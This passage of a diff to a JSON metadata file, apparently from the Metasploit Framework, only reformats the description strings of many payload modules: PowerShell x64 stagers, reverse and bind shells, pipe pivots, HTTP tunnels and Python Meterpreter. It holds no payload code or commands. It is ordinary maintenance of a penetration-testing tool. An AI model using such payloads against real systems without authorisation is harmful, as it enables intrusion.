+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185658,7 +186504,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -185695,7 +186541,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -185731,7 +186577,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -185767,7 +186613,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -185808,7 +186654,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -185845,7 +186691,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -185881,7 +186727,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -185919,7 +186765,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -185955,7 +186801,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -185991,7 +186837,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -186032,7 +186878,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -186069,7 +186915,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -186105,7 +186951,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [

    ],
@@ -186141,7 +186987,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [

    ],
@@ -186177,7 +187023,7 @@
      "Matt Graeber",
      "Shelby Pace"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect to MSF and read in stage",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
    "references": [

    ],
@@ -186212,7 +187058,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Execute an arbitrary command (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nExecute an arbitrary command (Windows x64)",
    "references": [

    ],
@@ -186248,7 +187094,7 @@
      "scriptjunkie",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Load an arbitrary x64 library path",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nLoad an arbitrary x64 library path",
    "references": [

    ],
@@ -186283,7 +187129,7 @@
      "Spencer McIntyre",
      "pasta <jaguinaga@infobytesec.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a dialog via MessageBox using a customizable title, text & icon",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
    "references": [

    ],
@@ -186320,7 +187166,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186358,7 +187204,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186397,7 +187243,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186435,7 +187281,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186477,7 +187323,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186515,7 +187361,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186553,7 +187399,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186594,7 +187440,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186632,7 +187478,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186670,7 +187516,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186712,7 +187558,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186750,7 +187596,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186788,7 +187634,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186826,7 +187672,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186863,7 +187709,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -186900,7 +187746,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -186936,7 +187782,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -186972,7 +187818,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -187013,7 +187859,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -187050,7 +187896,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187086,7 +187932,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -187122,7 +187968,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -187163,7 +188009,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -187200,7 +188046,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187235,7 +188081,7 @@
      "Spencer McIntyre",
      "bwatters-r7"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to attacker and report UUID (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x64)",
    "references": [

    ],
@@ -187381,7 +188227,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -187417,7 +188263,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187453,7 +188299,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -187488,7 +188334,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -187528,7 +188374,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -187564,7 +188410,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187599,7 +188445,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -187639,7 +188485,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -187675,7 +188521,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187710,7 +188556,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection and spawn a command shell (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell (Windows x64)",
    "references": [

    ],
@@ -187745,7 +188591,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to attacker and spawn a command shell (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
    "references": [

    ],
@@ -187780,7 +188626,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187817,7 +188663,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187854,7 +188700,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187890,7 +188736,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187931,7 +188777,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187968,7 +188814,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188005,7 +188851,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188044,7 +188890,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188080,7 +188926,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188121,7 +188967,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188158,7 +189004,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188195,7 +189041,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188232,7 +189078,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -188372,7 +189218,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
    "references": [

    ],
@@ -188407,7 +189253,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -188441,7 +189287,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -188475,7 +189321,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
    "references": [

    ],
@@ -188509,7 +189355,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -188545,7 +189391,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
    "references": [

    ],
@@ -188580,7 +189426,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -188614,7 +189460,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect to the victim and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188648,7 +189494,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188682,7 +189528,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188716,7 +189562,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188751,7 +189597,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Listens for a connection from the attacker, sends a UUID, then terminates",
